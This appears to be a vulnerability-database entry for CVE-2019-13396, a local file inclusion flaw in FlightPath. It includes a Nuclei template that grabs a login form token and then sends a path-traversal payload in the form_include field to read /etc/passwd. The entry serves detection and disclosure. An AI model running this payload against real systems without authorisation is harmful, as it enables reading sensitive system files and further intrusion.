CVE-2019-13396: FlightPath - Local File Inclusion

日期: 2025-08-01 | 影响软件: FlightPath | POC: 已公开

漏洞描述

FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.

PoC代码[已公开]

id: CVE-2019-13396

info:
  name: FlightPath - Local File Inclusion
  author: 0x_Akoko,daffainfo
  severity: medium
  description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
  impact: |
    This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47121
    - http://getflightpath.com/node/2650
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13396
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-13396
    cwe-id: CWE-22
    epss-score: 0.55014
    epss-percentile: 0.97979
    cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: getflightpath
    product: flightpath
  tags: cve,cve2019,flightpath,lfi,edb,getflightpath

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - "idden' name='form_token' value='([a-z0-9]+)'>"
        internal: true
        part: body
# digest: 490a004630440220351f26be42573d0e87caed26cc69ec221503893a5d0da3d9ce5b9be2c500422d022038d3ba16d816781a51640d9d859045d520d8822ba7aac9f38db8d8cd6af50e28:922c64590222798bb761d5b6d8e72950